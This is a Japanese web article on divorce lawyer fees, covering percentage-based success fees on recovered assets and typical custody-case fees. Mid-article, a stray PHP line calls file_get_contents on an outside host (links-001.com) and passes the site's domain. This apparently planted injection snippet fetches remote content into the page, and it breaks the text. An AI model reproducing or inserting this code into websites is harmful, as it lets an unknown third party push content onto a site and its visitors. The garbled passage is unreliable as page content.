前へ
次へ

離婚問題で弁護士に依頼する時の費用

離婚する時には、弁護士に相談している方も多いです。
弁護士は法律の専門家ですし、離婚に関する色々な知識も教えてくれますし、手間も省けることが多いからです。
ただし離婚問題に関して弁護士に相談する時には、費用もかかります。
その費用も複数の種類があって、基本的には獲得金額に左右されます。
離婚する際には、相手とお金の交渉をしなければなりません。
財産を、適正な割合で配分する必要があります。
ただ相手との交渉に難航してしまうと、受け取れる財産が若干少なくなってしまう可能性もあります。
その点弁護士に相談すると、受け取れる金額が若干高くなる事もある訳です。
その受け取った金額に応じて、弁護士に対する依頼費用も変わってきます。
基本的にはパーセンテージ制になっているからです。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

例えば法律事務所に対する成功報酬は、獲得額の20%であるとします。
受け取った金額の2割程度を支払う事になる訳ですが、その獲得額も人それぞれ異なる訳です。
400万円獲得できるケースもあれば、600万円というケースもあります。
400万円獲得した時には、20%相当の80万円を支払う事になりますし、600万円であれば120万円といった具合になります。
獲得額が多くなれば、それだけ多くの費用を弁護士に支払う訳です。
ですから弁護士に対する費用がどれぐらいになるかは、ケースバイケースです。
それと離婚問題は、親権も話し合う必要があります。
どちらが親権を取るかも話し合わなければありませんが、それで弁護士に相談している方も多いです。
親権の場合は、獲得額という概念はありません。
親権を取るか取れないかの二択になるからです。
このため弁護士に対する依頼費用も、ある程度固まっています。
15万円ぐらいになるケースも多いですが、それも法律事務所によって異なります。
10万円ぐらいになる事もあれば、20万円ぐらいになる事例もあります。
ただ離婚問題の親権の場合は、30万円や40万円などの金額になる事はまずありません。
高くても20万円です。

Page Top